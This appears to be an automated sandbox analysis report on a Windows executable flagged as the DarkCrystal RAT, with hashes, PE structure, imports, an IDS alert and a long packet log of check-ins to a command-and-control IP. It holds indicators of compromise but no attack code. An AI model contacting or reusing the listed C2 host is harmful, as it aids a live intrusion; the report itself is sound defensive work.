                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                    Process:C:\Windows\System32\PING.EXE
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):502
                                                                    Entropy (8bit):4.613055660879929
                                                                    Encrypted:false
                                                                    SSDEEP:12:Psfw5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:kydUOAokItULVDv
                                                                    MD5:B9588DDB2099F4D08809C69D95B82DF5
                                                                    SHA1:7CC70F272D791B40C9D373AD3683BB2B2F04554C
                                                                    SHA-256:85FB51B35C0C93136414542D49B7B0735B09F62D841E631F5D66F63B4B0F3308
                                                                    SHA-512:7755062BDE4E873A4DAA93584B262FA0EAF6EF3DBF0058002174480C82A1812B53A3E5C01FFD404F01D11FE6729A4841C96DAECC69A5688B9D06EDDB1A4881AF
                                                                    Malicious:false
                                                                    Preview:..Pinging 715575 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.9549327993602565
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:hT7clR9Gz2.exe
                                                                    File size:2'733'200 bytes
                                                                    MD5:0cadb063c76cec669e88f104493a56f1
                                                                    SHA1:929cf2e69d8afe9485d47a4a1c80cfe5a0ac9321
                                                                    SHA256:31c9aec77607a885cf75c66cd02b721bf4a866444d58bf2eaa766ef928830cb3
                                                                    SHA512:e1268ecd98442ec6b6b48d282daf9d58ad91e10daa1123af0d1a4d2580922bfc5809570c116429c227a5a4a9c49564776412729f7e3ce2154fec84339a70906f
                                                                    SSDEEP:49152:IBJIcarPNfax+qE7co8QdLbbr1yvdnSJP4v8kHIiQrAFmNHL/hBPWgG5z:yCnPVawqwnZJylyP4kRl7PWgu
                                                                    TLSH:66C523027ED290B2C83209364A367B11B93CBC651FBACED76744272DDA752E0DA31776
                                                                    Icon Hash:1515d4d4442f2d2d
                                                                    Entrypoint:0x41f530
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                    Instruction
                                                                    Programming Language:
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                    .text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                    PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
                                                                    PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
                                                                    RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
                                                                    RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
                                                                    RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
                                                                    RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
                                                                    RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
                                                                    RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
                                                                    RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
                                                                    RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
                                                                    RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
                                                                    RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
                                                                    RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
                                                                    RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
                                                                    RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
                                                                    RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
                                                                    RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
                                                                    RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
                                                                    RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
                                                                    RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
                                                                    RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
                                                                    RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
                                                                    RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
                                                                    RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
                                                                    RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
                                                                    RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
                                                                    RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
                                                                    DLL | Import
                                                                    KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                    OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
                                                                    gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                                                    Language of compilation system | Country where language is spoken | Map
                                                                    English | United States |
                                                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                    03/05/24-22:27:38.801530 | TCP | 2048095 | ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) | 49712 | 80 | 192.168.2.5 | 91.227.16.11
                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Mar 5, 2024 22:27:40.692538023 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:40.695722103 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:40.902708054 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:40.930201054 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:40.971128941 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.119770050 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.123929977 CET4971380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.124023914 CET4971680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.327897072 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:41.328083038 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.331806898 CET804971691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:41.331902027 CET4971680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.332324982 CET4971680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.334671974 CET804971391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:41.334733963 CET4971380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.538918018 CET804971691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:41.539086103 CET804971691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:41.546672106 CET4971680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.753654957 CET804971691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:41.779422998 CET804971691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:41.826311111 CET4971680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:42.573457956 CET4971880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:42.785317898 CET804971891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:42.785419941 CET4971880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:42.785655975 CET4971880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:42.997642994 CET804971891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:42.997656107 CET804971891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:43.000134945 CET4971880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:43.211087942 CET804971891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:43.240186930 CET804971891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:43.279428005 CET4971880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:43.686630964 CET4971880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:43.688293934 CET4971980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:43.897047997 CET804971991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:43.897166014 CET4971980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:43.897362947 CET4971980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:43.897548914 CET804971891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:43.897691965 CET4971880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:44.106237888 CET804971991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:44.106301069 CET804971991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:44.106573105 CET4971980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:44.315160036 CET804971991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:44.335654974 CET4971680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:44.340728045 CET804971991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:44.576292038 CET4971980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:45.361994028 CET4971980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:45.362554073 CET4972080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:45.570801973 CET804971991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:45.570880890 CET4971980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:45.572491884 CET804972091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:45.572590113 CET4972080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:45.572776079 CET4972080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:45.782697916 CET804972091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:45.782732010 CET804972091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:45.782968044 CET4972080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:45.993279934 CET804972091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:46.017302990 CET804972091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:46.123182058 CET4972080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:47.378238916 CET4972080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:47.379172087 CET4972280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:47.588100910 CET804972091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:47.588195086 CET4972080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:47.590804100 CET804972291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:47.590884924 CET4972280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:47.591056108 CET4972280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:47.802745104 CET804972291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:47.802783966 CET804972291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:47.803042889 CET4972280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:48.014801025 CET804972291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:48.041311026 CET804972291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:48.123178005 CET4972280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:50.825650930 CET4972280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:50.827208042 CET4972480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.031073093 CET4972580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.035710096 CET804972491.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.035872936 CET4972480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.037878036 CET804972291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.037939072 CET4972280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.186572075 CET4972680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.239940882 CET804972591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.240181923 CET4972580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.240278959 CET4972580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.393663883 CET804972691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.393757105 CET4972680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.393934965 CET4972680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.449018955 CET804972591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.449037075 CET804972591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.449239969 CET4972580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.600509882 CET804972691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.600543022 CET804972691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.600830078 CET4972680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.658437014 CET804972591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.683653116 CET804972591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.732666969 CET4972580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.807854891 CET804972691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.835338116 CET804972691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.966953039 CET4972680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.038647890 CET4972580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.038763046 CET4972680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.040537119 CET4972880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.245843887 CET804972691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:52.245938063 CET4972680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.247339010 CET804972591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:52.247597933 CET4972580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.251183987 CET804972891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:52.251271009 CET4972880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.251434088 CET4972880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.462176085 CET804972891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:52.462318897 CET804972891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:52.462518930 CET4972880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.675096035 CET804972891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:52.700391054 CET804972891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:52.856338978 CET4972880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.857768059 CET4972980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.067193985 CET804972891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:53.068556070 CET804972991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:53.068727016 CET4972880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.068809032 CET4972980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.072901011 CET4972980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.283654928 CET804972991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:53.283679008 CET804972991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:53.283909082 CET4972980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.494862080 CET804972991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:53.519001007 CET804972991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:53.576329947 CET4972980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.685764074 CET4972980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.686964989 CET4973080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.895731926 CET804973091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:53.895827055 CET4973080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.895978928 CET4973080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.896411896 CET804972991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:53.896620035 CET4972980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:54.104897022 CET804973091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:54.104914904 CET804973091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:54.105109930 CET4973080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:54.313968897 CET804973091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:54.338901997 CET804973091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:54.435666084 CET4973080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:54.504595995 CET4973080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:54.506339073 CET4973180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:54.713612080 CET804973091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:54.713686943 CET4973080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:54.716958046 CET804973191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:54.717140913 CET4973180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:54.722373962 CET4973180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:54.933713913 CET804973191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:54.938949108 CET804973191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:54.939342022 CET4973180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:55.150933027 CET804973191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:55.174726009 CET804973191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:55.216995001 CET4973180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:55.315391064 CET4973180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:55.316189051 CET4973280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:55.526549101 CET804973191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:55.526725054 CET4973180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:55.528381109 CET804973291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:55.528474092 CET4973280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:55.528637886 CET4973280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:55.740472078 CET804973291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:55.740523100 CET804973291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:55.740818977 CET4973280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:55.953008890 CET804973291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:55.979285002 CET804973291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:56.020348072 CET4973280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:56.162905931 CET4973280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:56.163889885 CET4973380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:56.372473955 CET804973391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:56.373303890 CET4973380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:56.373497009 CET4973380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:56.375245094 CET804973291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:56.379118919 CET4973280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:56.583456039 CET804973391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:56.583475113 CET804973391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:56.583683014 CET4973380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:56.687632084 CET4973380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:56.687871933 CET4973480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:56.792756081 CET804973391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:56.820386887 CET804973391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:56.820445061 CET4973380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:56.857630014 CET4973580192.168.2.591.227.16.11
